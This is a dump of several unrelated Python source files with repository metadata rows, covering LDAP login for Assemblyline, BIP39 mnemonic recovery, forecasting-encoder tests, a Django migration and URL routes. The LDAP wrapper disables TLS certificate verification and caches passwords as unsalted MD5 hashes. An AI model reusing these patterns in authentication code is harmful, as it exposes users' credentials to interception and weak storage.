] | 13 | 2020-08-15T16:10:58.000Z | 2022-01-14T17:15:09.000Z | import base64
import hashlib
import ldap
import logging
import time
from assemblyline.common.str_utils import safe_str
from assemblyline_ui.config import config, CLASSIFICATION
from assemblyline_ui.helper.user import get_dynamic_classification
from assemblyline_ui.http_exceptions import AuthenticationException
log = logging.getLogger('assemblyline.ldap_authenticator')
#####################################################
# Functions
#####################################################
class BasicLDAPWrapper(object):
CACHE_SEC_LEN = 300
def __init__(self, ldap_config):
"""
:param ldap_config: dict containing configuration params for LDAP
"""
self.ldap_uri = ldap_config.uri
self.base = ldap_config.base
self.uid_lookup = f"{ldap_config.uid_field}=%s"
self.group_lookup = ldap_config.group_lookup_query
self.bind_user = ldap_config.bind_user
self.bind_pass = ldap_config.bind_pass
self.admin_dn = ldap_config.admin_dn
self.sm_dn = ldap_config.signature_manager_dn
self.si_dn = ldap_config.signature_importer_dn
self.classification_mappings = ldap_config.classification_mappings
self.cache = {}
self.get_obj_cache = {}
def create_connection(self):
if "ldaps://" in self.ldap_uri:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER)
ldap_server = ldap.initialize(self.ldap_uri)
ldap_server.protocol_version = ldap.VERSION3
ldap_server.set_option(ldap.OPT_REFERRALS, 0)
if self.bind_user and self.bind_pass:
ldap_server.simple_bind_s(self.bind_user, self.bind_pass)
return ldap_server
def get_group_list(self, dn, ldap_server=None):
group_list = [x[0] for x in self.get_object(self.group_lookup % dn, ldap_server)["ldap"]]
group_list.append(dn)
return group_list
def get_user_types(self, group_dn_list):
user_type = ['user']
if self.admin_dn in group_dn_list:
user_type.append('admin')
if self.sm_dn in group_dn_list:
user_type.append('signature_manager')
if self.si_dn in group_dn_list:
user_type.append('signature_importer')
return user_type
def get_user_classification(self, group_dn_list):
"""
Extend the users classification information with the configured group information
NB: This is not fully implemented at this point
:param group_dn_list: list of DNs the user is member of
:return:
"""
ret = CLASSIFICATION.UNRESTRICTED
for group_dn in group_dn_list:
if group_dn in self.classification_mappings:
ret = CLASSIFICATION.build_user_classification(ret, self.classification_mappings[group_dn])
return ret
def get_object(self, ldap_object, ldap_server=None):
cur_time = int(time.time())
cache_entry = self.get_obj_cache.get(ldap_object, None)
if cache_entry and cache_entry['expiry'] > cur_time:
# load obj from cache
return {"error": None, "ldap": cache_entry['details'], "cached": True}
if not ldap_server:
try:
ldap_server = self.create_connection()
except Exception as le:
return {"error": "Error connecting to ldap server. Reason: %s" % (repr(le)),
"ldap": None, "cached": False}
try:
res = ldap_server.search_s(self.base, ldap.SCOPE_SUBTREE, ldap_object)
# Save cache get_obj
self.get_obj_cache[ldap_object] = {"expiry": cur_time + self.CACHE_SEC_LEN, "details": res}
return {"error": None, "ldap": res, "cached": False}
except ldap.UNWILLING_TO_PERFORM:
return {"error": "ldap server is unwilling to perform the operation.", "ldap": None, "cached": False}
except ldap.LDAPError as le:
return {"error": "An error occurred while talking to the ldap server: %s" % repr(le), "ldap": None,
"cached": False}
# noinspection PyBroadException
def login(self, user, password):
cur_time = int(time.time())
password_digest = hashlib.md5(password.encode('utf-8')).hexdigest()
cache_entry = self.cache.get(user, None)
if cache_entry:
if cache_entry['expiry'] > cur_time and cache_entry['password'] == password_digest:
cache_entry["cached"] = True
return cache_entry
try:
ldap_server = self.create_connection()
ldap_ret = self.get_details_from_uid(user, ldap_server=ldap_server)
if ldap_ret and len(ldap_ret) == 2:
dn, details = ldap_ret
group_list = self.get_group_list(dn, ldap_server=ldap_server)
ldap_server.simple_bind_s(dn, password)
cache_entry = {"password": password_digest, "expiry": cur_time + self.CACHE_SEC_LEN,
"connection": ldap_server, "details": details, "cached": False,
"classification": self.get_user_classification(group_list),
"type": self.get_user_types(group_list), 'dn': dn}
self.cache[user] = cache_entry
return cache_entry
except Exception as e:
# raise AuthenticationException('Unable to login to ldap server. [%s]' % str(e))
log.exception('Unable to login to ldap server. [%s]' % str(e))
return None
# noinspection PyBroadException
def get_details_from_uid(self, uid, ldap_server=None):
res = self.get_object(self.uid_lookup % uid, ldap_server)
if res['error']:
log.error(res['error'])
return None
try:
return res['ldap'][0]
except Exception:
return None
def get_attribute(ldap_login_info, key, safe=True):
details = ldap_login_info.get('details')
if details:
value = details.get(key, [])
if len(value) >= 1:
if safe:
return safe_str(value[0])
else:
return value[0]
return None
def validate_ldapuser(username, password, storage):
if config.auth.ldap.enabled and username and password:
ldap_obj = BasicLDAPWrapper(config.auth.ldap)
ldap_info = ldap_obj.login(username, password)
if ldap_info:
cur_user = storage.user.get(username, as_obj=False) or {}
# Make sure the user exists in AL and is in sync
if (not cur_user and config.auth.ldap.auto_create) or (cur_user and config.auth.ldap.auto_sync):
u_classification = ldap_info['classification']
# Normalize email address
email = get_attribute(ldap_info, config.auth.ldap.email_field)
if email is not None:
email = email.lower()
u_classification = get_dynamic_classification(u_classification, email)
# Generate user data from ldap
data = dict(
classification=u_classification,
uname=username,
name=get_attribute(ldap_info, config.auth.ldap.name_field) or username,
email=email,
password="__NO_PASSWORD__",
type=ldap_info['type'],
dn=ldap_info['dn']
)
# Save the user avatar avatar from ldap
img_data = get_attribute(ldap_info, config.auth.ldap.image_field, safe=False)
if img_data:
b64_img = base64.b64encode(img_data).decode()
avatar = f'data:image/{config.auth.ldap.image_format};base64,{b64_img}'
storage.user_avatar.save(username, avatar)
# Save the updated user
cur_user.update(data)
storage.user.save(username, cur_user)
if cur_user:
return username, ["R", "W", "E"]
else:
raise AuthenticationException("User auto-creation is disabled")
elif config.auth.internal.enabled:
# Fallback to internal auth
pass
else:
raise AuthenticationException("Wrong username or password")
return None, None
| 39.297674 | 113 | 0.605871 | 1,012 | 8,449 | 4.815217 | 0.199605 | 0.051303 | 0.022984 | 0.012313 | 0.155756 | 0.101991 | 0.088447 | 0.03386 | 0.027909 | 0 | 0 | 0.004197 | 0.295065 | 8,449 | 214 | 114 | 39.481308 | 0.813969 | 0.075394 | 0 | 0.111111 | 0 | 0 | 0.085662 | 0.015217 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065359 | false | 0.091503 | 0.071895 | 0 | 0.281046 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
52aac1e125cfaa8a910431ade1ba06863dbcee6c | 2,722 | py | Python | garecovery/mnemonic.py | LeoComandini/garecovery | 66f7fe4c15b3866e751162fd990bd5bc8c58ec7a | [
"MIT"
] | 61 | 2017-08-30T13:16:42.000Z | 2022-03-24T16:28:18.000Z | garecovery/mnemonic.py | baby636/garecovery | 9ced74920b804adc3a7be443f09a950a884c8c0c | [
"MIT"
] | 34 | 2017-08-11T16:58:16.000Z | 2022-02-18T09:00:23.000Z | garecovery/mnemonic.py | baby636/garecovery | 9ced74920b804adc3a7be443f09a950a884c8c0c | [
"MIT"
] | 46 | 2017-08-09T18:11:55.000Z | 2022-03-04T05:30:54.000Z | import wallycore as wally
from . import exceptions
from gaservices.utils import h2b
wordlist_ = wally.bip39_get_wordlist('en')
wordlist = [wally.bip39_get_word(wordlist_, i) for i in range(2048)]
def seed_from_mnemonic(mnemonic_or_hex_seed):
"""Return seed, mnemonic given an input string
mnemonic_or_hex_seed can either be:
- A mnemonic
- A hex seed, with an 'X' at the end, which needs to be stripped
seed will always be returned, mnemonic may be None if a seed was passed
"""
if mnemonic_or_hex_seed.endswith('X'):
mnemonic = None
seed = h2b(mnemonic_or_hex_seed[:-1])
else:
mnemonic = mnemonic_or_hex_seed
written, seed = wally.bip39_mnemonic_to_seed512(mnemonic_or_hex_seed, None)
assert written == wally.BIP39_SEED_LEN_512
assert len(seed) == wally.BIP39_SEED_LEN_512
return seed, mnemonic
def wallet_from_mnemonic(mnemonic_or_hex_seed, ver=wally.BIP32_VER_MAIN_PRIVATE):
"""Generate a BIP32 HD Master Key (wallet) from a mnemonic phrase or a hex seed"""
seed, mnemonic = seed_from_mnemonic(mnemonic_or_hex_seed)
return wally.bip32_key_from_seed(seed, ver, wally.BIP32_FLAG_SKIP_HASH)
def _decrypt_mnemonic(mnemonic, password):
"""Decrypt a 27 word encrypted mnemonic to a 24 word mnemonic"""
mnemonic = ' '.join(mnemonic.split())
entropy = bytearray(wally.BIP39_ENTROPY_LEN_288)
assert wally.bip39_mnemonic_to_bytes(None, mnemonic, entropy) == len(entropy)
salt, encrypted = entropy[32:], entropy[:32]
derived = bytearray(64)
wally.scrypt(password.encode('utf-8'), salt, 16384, 8, 8, derived)
key, decrypted = derived[32:], bytearray(32)
wally.aes(key, encrypted, wally.AES_FLAG_DECRYPT, decrypted)
for i in range(len(decrypted)):
decrypted[i] ^= derived[i]
if wally.sha256d(decrypted)[:4] != salt:
raise exceptions.InvalidMnemonicOrPasswordError('Incorrect password')
return wally.bip39_mnemonic_from_bytes(None, decrypted)
def check_mnemonic_or_hex_seed(mnemonic):
"""Raise an error if mnemonic/hex seed is invalid"""
if ' ' not in mnemonic:
if mnemonic.endswith('X'):
# mnemonic is the hex seed
return
msg = 'Mnemonic words must be separated by spaces, hex seed must end with X'
raise exceptions.InvalidMnemonicOrPasswordError(msg)
for word in mnemonic.split():
if word not in wordlist:
msg = 'Invalid word: {}'.format(word)
raise exceptions.InvalidMnemonicOrPasswordError(msg)
try:
wally.bip39_mnemonic_validate(None, mnemonic)
except ValueError:
raise exceptions.InvalidMnemonicOrPasswordError('Invalid mnemonic checksum')
| 37.805556 | 86 | 0.709405 | 369 | 2,722 | 5.03523 | 0.311653 | 0.052745 | 0.062971 | 0.082347 | 0.092573 | 0.057589 | 0.041981 | 0.041981 | 0 | 0 | 0 | 0.032599 | 0.199853 | 2,722 | 71 | 87 | 38.338028 | 0.820478 | 0.161646 | 0 | 0.043478 | 0 | 0 | 0.061607 | 0 | 0 | 0 | 0 | 0 | 0.065217 | 1 | 0.086957 | false | 0.130435 | 0.065217 | 0 | 0.23913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
52b2cef2321b28d9b382b11b584f50285ddca3b9 | 482 | py | Python | api/features/exceptions.py | SolidStateGroup/Bullet-Train-API | ea47ccbdadf665a806ae4e0eff6ad1a2f1b0ba19 | [
"BSD-3-Clause"
] | 126 | 2019-12-13T18:41:43.000Z | 2020-11-10T13:33:55.000Z | api/features/exceptions.py | SolidStateGroup/Bullet-Train-API | ea47ccbdadf665a806ae4e0eff6ad1a2f1b0ba19 | [
"BSD-3-Clause"
] | 30 | 2019-12-12T16:52:01.000Z | 2020-11-09T18:55:29.000Z | api/features/exceptions.py | SolidStateGroup/Bullet-Train-API | ea47ccbdadf665a806ae4e0eff6ad1a2f1b0ba19 | [
"BSD-3-Clause"
] | 20 | 2020-02-14T21:55:36.000Z | 2020-11-03T22:29:03.000Z | from rest_framework import status
from rest_framework.exceptions import APIException
class FeatureStateVersionError(APIException):
status_code = status.HTTP_400_BAD_REQUEST
class FeatureStateVersionAlreadyExistsError(FeatureStateVersionError):
status_code = status.HTTP_400_BAD_REQUEST
def __init__(self, version: int):
super(FeatureStateVersionAlreadyExistsError, self).__init__(
f"Version {version} already exists for FeatureState."
)
| 30.125 | 70 | 0.786307 | 47 | 482 | 7.680851 | 0.553191 | 0.044321 | 0.094183 | 0.110803 | 0.182825 | 0.182825 | 0.182825 | 0 | 0 | 0 | 0 | 0.014778 | 0.157676 | 482 | 15 | 71 | 32.133333 | 0.874384 | 0 | 0 | 0.2 | 0 | 0 | 0.103734 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
52b53fc840acc1bf09eb244812212a0134629fbd | 11,030 | py | Python | tests/test_transforms/test_encoders/test_categorical_transform.py | Pacman1984/etna | 9b3ccb980e576d56858f14aca2e06ce2957b0fa9 | [
"Apache-2.0"
] | 96 | 2021-09-05T06:29:34.000Z | 2021-11-07T15:22:54.000Z | tests/test_transforms/test_encoders/test_categorical_transform.py | Pacman1984/etna | 9b3ccb980e576d56858f14aca2e06ce2957b0fa9 | [
"Apache-2.0"
] | 188 | 2021-09-06T15:59:58.000Z | 2021-11-17T09:34:16.000Z | tests/test_transforms/test_encoders/test_categorical_transform.py | Pacman1984/etna | 9b3ccb980e576d56858f14aca2e06ce2957b0fa9 | [
"Apache-2.0"
] | 8 | 2021-09-06T09:18:35.000Z | 2021-11-11T21:18:39.000Z | import numpy as np
import pandas as pd
import pytest
from etna.datasets import TSDataset
from etna.datasets import generate_ar_df
from etna.datasets import generate_const_df
from etna.datasets import generate_periodic_df
from etna.metrics import R2
from etna.models import LinearPerSegmentModel
from etna.transforms import FilterFeaturesTransform
from etna.transforms.encoders.categorical import LabelEncoderTransform
from etna.transforms.encoders.categorical import OneHotEncoderTransform
@pytest.fixture
def two_df_with_new_values():
d = {
"timestamp": list(pd.date_range(start="2021-01-01", end="2021-01-03"))
+ list(pd.date_range(start="2021-01-01", end="2021-01-03")),
"segment": ["segment_0", "segment_0", "segment_0", "segment_1", "segment_1", "segment_1"],
"regressor_0": [5, 8, 5, 9, 5, 9],
"target": [1, 2, 3, 4, 5, 6],
}
df1 = TSDataset.to_dataset(pd.DataFrame(d))
d = {
"timestamp": list(pd.date_range(start="2021-01-01", end="2021-01-03"))
+ list(pd.date_range(start="2021-01-01", end="2021-01-03")),
"segment": ["segment_0", "segment_0", "segment_0", "segment_1", "segment_1", "segment_1"],
"regressor_0": [5, 8, 9, 5, 0, 0],
"target": [1, 2, 3, 4, 5, 6],
}
df2 = TSDataset.to_dataset(pd.DataFrame(d))
return df1, df2
@pytest.fixture
def df_for_ohe_encoding():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
d = {
"timestamp": pd.date_range(start="2021-01-01", end="2021-01-12"),
"regressor_0": [5, 8, 5, 8, 5, 8, 5, 8, 5, 8, 5, 8],
"regressor_1": [9, 5, 9, 5, 9, 5, 9, 5, 9, 5, 9, 5],
"regressor_2": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"regressor_3": [1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7],
}
df_regressors = pd.DataFrame(d)
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
answer_on_regressor_0 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_0["test_0"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 5))
answer_on_regressor_0["test_1"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 8))
answer_on_regressor_0["test_0"] = answer_on_regressor_0["test_0"].astype("category")
answer_on_regressor_0["test_1"] = answer_on_regressor_0["test_1"].astype("category")
answer_on_regressor_1 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_1["test_0"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 5))
answer_on_regressor_1["test_1"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 9))
answer_on_regressor_1["test_0"] = answer_on_regressor_1["test_0"].astype("category")
answer_on_regressor_1["test_1"] = answer_on_regressor_1["test_1"].astype("category")
answer_on_regressor_2 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_2["test_0"] = answer_on_regressor_2["regressor_2"].apply(lambda x: float(x == 0))
answer_on_regressor_2["test_0"] = answer_on_regressor_2["test_0"].astype("category")
return tsdataset.df, (answer_on_regressor_0, answer_on_regressor_1, answer_on_regressor_2)
@pytest.fixture
def df_for_label_encoding():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
d = {
"timestamp": pd.date_range(start="2021-01-01", end="2021-01-12"),
"regressor_0": [5, 8, 5, 8, 5, 8, 5, 8, 5, 8, 5, 8],
"regressor_1": [9, 5, 9, 5, 9, 5, 9, 5, 9, 5, 9, 5],
"regressor_2": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"regressor_3": [1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7],
}
df_regressors = pd.DataFrame(d)
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
answer_on_regressor_0 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_0["test"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 8))
answer_on_regressor_0["test"] = answer_on_regressor_0["test"].astype("category")
answer_on_regressor_1 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_1["test"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 9))
answer_on_regressor_1["test"] = answer_on_regressor_1["test"].astype("category")
answer_on_regressor_2 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_2["test"] = answer_on_regressor_2["regressor_2"].apply(lambda x: float(x == 1))
answer_on_regressor_2["test"] = answer_on_regressor_2["test"].astype("category")
return tsdataset.df, (answer_on_regressor_0, answer_on_regressor_1, answer_on_regressor_2)
@pytest.fixture
def df_for_naming():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
df_regressors = generate_periodic_df(12, start_time="2021-01-01", scale=10, period=2, n_segments=2)
df_regressors = df_regressors.pivot(index="timestamp", columns="segment").reset_index()
df_regressors.columns = ["timestamp"] + ["regressor_1", "2"]
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
return tsdataset.df
def test_label_encoder_simple(df_for_label_encoding):
"""Test that LabelEncoderTransform works correct in a simple cases."""
df, answers = df_for_label_encoding
for i in range(3):
le = LabelEncoderTransform(in_column=f"regressor_{i}", out_column="test")
le.fit(df)
cols = le.transform(df)["segment_0"].columns
assert le.transform(df)["segment_0"][cols].equals(answers[i][cols])
def test_ohe_encoder_simple(df_for_ohe_encoding):
"""Test that OneHotEncoderTransform works correct in a simple case."""
df, answers = df_for_ohe_encoding
for i in range(3):
ohe = OneHotEncoderTransform(in_column=f"regressor_{i}", out_column="test")
ohe.fit(df)
cols = ohe.transform(df)["segment_0"].columns
assert ohe.transform(df)["segment_0"][cols].equals(answers[i][cols])
def test_value_error_label_encoder(df_for_label_encoding):
"""Test LabelEncoderTransform with wrong strategy."""
df, _ = df_for_label_encoding
with pytest.raises(ValueError, match="The strategy"):
le = LabelEncoderTransform(in_column="target", strategy="new_vlue")
le.fit(df)
le.transform(df)
@pytest.mark.parametrize(
"strategy, expected_values",
[
("new_value", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, -1, 5], [9, -1, 3, 0, -1, 6]])),
("none", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, np.nan, 5], [9, np.nan, 3, 0, np.nan, 6]])),
("mean", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, 0, 5], [9, 0.5, 3, 0, 0, 6]])),
],
)
def test_new_value_label_encoder(two_df_with_new_values, strategy, expected_values):
"""Test LabelEncoderTransform correct works with unknown values."""
df1, df2 = two_df_with_new_values
le = LabelEncoderTransform(in_column="regressor_0", strategy=strategy)
le.fit(df1)
np.testing.assert_array_almost_equal(le.transform(df2).values, expected_values)
def test_new_value_ohe_encoder(two_df_with_new_values):
"""Test OneHotEncoderTransform correct works with unknown values."""
expected_values = np.array(
[
[5.0, 1.0, 1.0, 0.0, 5.0, 4.0, 1.0, 0.0],
[8.0, 2.0, 0.0, 1.0, 0.0, 5.0, 0.0, 0.0],
[9.0, 3.0, 0.0, 0.0, 0.0, 6.0, 0.0, 0.0],
]
)
df1, df2 = two_df_with_new_values
ohe = OneHotEncoderTransform(in_column="regressor_0", out_column="targets")
ohe.fit(df1)
np.testing.assert_array_almost_equal(ohe.transform(df2).values, expected_values)
def test_naming_ohe_encoder(two_df_with_new_values):
"""Test OneHotEncoderTransform gives the correct columns."""
df1, df2 = two_df_with_new_values
ohe = OneHotEncoderTransform(in_column="regressor_0", out_column="targets")
ohe.fit(df1)
segments = ["segment_0", "segment_1"]
target = ["target", "targets_0", "targets_1", "regressor_0"]
assert set([(i, j) for i in segments for j in target]) == set(ohe.transform(df2).columns.values)
@pytest.mark.parametrize(
"in_column, prefix",
[("2", ""), ("regressor_1", "regressor_")],
)
def test_naming_ohe_encoder_no_out_column(df_for_naming, in_column, prefix):
"""Test OneHotEncoderTransform gives the correct columns with no out_column."""
df = df_for_naming
ohe = OneHotEncoderTransform(in_column=in_column)
ohe.fit(df)
answer = set(
list(df["segment_0"].columns) + [prefix + str(ohe.__repr__()) + "_0", prefix + str(ohe.__repr__()) + "_1"]
)
assert answer == set(ohe.transform(df)["segment_0"].columns.values)
@pytest.mark.parametrize(
"in_column, prefix",
[("2", ""), ("regressor_1", "regressor_")],
)
def test_naming_label_encoder_no_out_column(df_for_naming, in_column, prefix):
"""Test LabelEncoderTransform gives the correct columns with no out_column."""
df = df_for_naming
le = LabelEncoderTransform(in_column=in_column)
le.fit(df)
answer = set(list(df["segment_0"].columns) + [prefix + str(le.__repr__())])
assert answer == set(le.transform(df)["segment_0"].columns.values)
@pytest.fixture
def ts_for_ohe_sanity():
df_to_forecast = generate_const_df(periods=100, start_time="2021-01-01", scale=0, n_segments=1)
df_regressors = generate_periodic_df(periods=120, start_time="2021-01-01", scale=10, period=4, n_segments=1)
df_regressors = df_regressors.pivot(index="timestamp", columns="segment").reset_index()
df_regressors.columns = ["timestamp"] + [f"regressor_{i}" for i in range(1)]
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
rng = np.random.default_rng(12345)
def f(x):
return x ** 2 + rng.normal(0, 0.01)
df_to_forecast["segment_0", "target"] = df_regressors["segment_0"]["regressor_0"][:100].apply(f)
ts = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
return ts
def test_ohe_sanity(ts_for_ohe_sanity):
"""Test for correct work in the full forecasting pipeline."""
horizon = 10
train_ts, test_ts = ts_for_ohe_sanity.train_test_split(test_size=horizon)
ohe = OneHotEncoderTransform(in_column="regressor_0")
filt = FilterFeaturesTransform(exclude=["regressor_0"])
train_ts.fit_transform([ohe, filt])
model = LinearPerSegmentModel()
model.fit(train_ts)
future_ts = train_ts.make_future(horizon)
forecast_ts = model.forecast(future_ts)
r2 = R2()
assert 1 - r2(test_ts, forecast_ts)["segment_0"] < 1e-5
| 44.837398 | 114 | 0.685766 | 1,691 | 11,030 | 4.176818 | 0.096393 | 0.013592 | 0.105904 | 0.014725 | 0.734249 | 0.696446 | 0.630469 | 0.594082 | 0.556987 | 0.530653 | 0 | 0.061487 | 0.161015 | 11,030 | 245 | 115 | 45.020408 | 0.701751 | 0.050771 | 0 | 0.406091 | 1 | 0 | 0.13018 | 0 | 0 | 0 | 0 | 0 | 0.040609 | 1 | 0.076142 | false | 0 | 0.060914 | 0.005076 | 0.167513 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52b58fbb3b5abd32caee769dd685ed00d95121c9 | 1,467 | py | Python | platform/core/polyaxon/db/migrations/0017_auto_20190104_2032.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | platform/core/polyaxon/db/migrations/0017_auto_20190104_2032.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | platform/core/polyaxon/db/migrations/0017_auto_20190104_2032.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.1.3 on 2019-01-04 20:32
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import libs.spec_validation
class Migration(migrations.Migration):
dependencies = [
('db', '0016_experimentjob_sequence_and_deleted_flag_tpu_resources'),
]
operations = [
migrations.AddField(
model_name='buildjob',
name='persistence',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='The persistence definition.', null=True, validators=[libs.spec_validation.validate_persistence_config]),
),
migrations.AddField(
model_name='project',
name='persistence',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='The persistence definition.', null=True, validators=[libs.spec_validation.validate_persistence_config]),
),
migrations.AlterField(
model_name='nodegpu',
name='memory',
field=models.BigIntegerField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='nodegpu',
name='name',
field=models.CharField(blank=True, max_length=256, null=True),
),
migrations.AlterField(
model_name='nodegpu',
name='serial',
field=models.CharField(blank=True, max_length=256, null=True),
),
]
| 35.780488 | 192 | 0.641445 | 153 | 1,467 | 6 | 0.424837 | 0.04902 | 0.068627 | 0.088235 | 0.647059 | 0.6122 | 0.579521 | 0.579521 | 0.48366 | 0.48366 | 0 | 0.023466 | 0.244717 | 1,467 | 40 | 193 | 36.675 | 0.805054 | 0.030675 | 0 | 0.558824 | 1 | 0 | 0.132394 | 0.040845 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.088235 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52b68564244ef7d53bf8d8e23a3a806ccdf7449e | 544 | py | Python | webserver/testserver/main/urls.py | frankovacevich/aleph | 9b01dcabf3c074e8617e50fffd35c9ee1960eab6 | [
"MIT"
] | null | null | null | webserver/testserver/main/urls.py | frankovacevich/aleph | 9b01dcabf3c074e8617e50fffd35c9ee1960eab6 | [
"MIT"
] | null | null | null | webserver/testserver/main/urls.py | frankovacevich/aleph | 9b01dcabf3c074e8617e50fffd35c9ee1960eab6 | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('home', views.home, name='home'),
path('login', views.ulogin, name='login'),
path('logout', views.ulogout, name='logout'),
path('password_change', views.password_change, name='password_change'),
# path('users', views.users, name='users'),
path('explorer', views.explorer, name='explorer'),
# path('reports/base_report', views.resources, name='reports'),
# path('docs', views.docs, name='docs'),
] | 30.222222 | 75 | 0.650735 | 67 | 544 | 5.223881 | 0.343284 | 0.12 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150735 | 544 | 18 | 76 | 30.222222 | 0.757576 | 0.261029 | 0 | 0 | 0 | 0 | 0.203008 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
52b72cd9290f8164c698fae5869224cfa6d4ff36 | 8,603 | py | Python | exporter.py | mrDoctorWho/VK-Exporter | ecdcc818b2b375b2a42f0b106706c62cf833e1c4 | [
"MIT"
] | 9 | 2015-01-16T09:24:47.000Z | 2021-04-29T15:41:56.000Z | exporter.py | mrDoctorWho/VK-Exporter | ecdcc818b2b375b2a42f0b106706c62cf833e1c4 | [
"MIT"
] | 5 | 2018-04-02T05:50:20.000Z | 2018-06-05T23:40:35.000Z | exporter.py | mrDoctorWho/VK-Exporter | ecdcc818b2b375b2a42f0b106706c62cf833e1c4 | [
"MIT"
] | 1 | 2019-10-23T05:29:20.000Z | 2019-10-23T05:29:20.000Z | #!/usr/bin/env python2
# coding: utf-8
# based on the vk4xmpp gateway, v2.25
# © simpleApps, 2013 — 2014.
# Program published under MIT license.
import gc
import json
import logging
import os
import re
import signal
import sys
import threading
import time
import urllib
core = getattr(sys.modules["__main__"], "__file__", None)
if core:
core = os.path.abspath(core)
root = os.path.dirname(core)
if root:
os.chdir(root)
sys.path.insert(0, "library")
reload(sys).setdefaultencoding("utf-8")
from datetime import datetime
from webtools import *
from writer import *
from stext import *
from stext import _
setVars("ru", root)
Semaphore = threading.Semaphore()
LOG_LEVEL = logging.DEBUG
EXTENSIONS = []
MAXIMUM_FORWARD_DEPTH = 100
pidFile = "pidFile.txt"
logFile = "vk4xmpp.log"
crashDir = "crash"
PhotoSize = "photo_100"
logger = logging.getLogger("vk4xmpp")
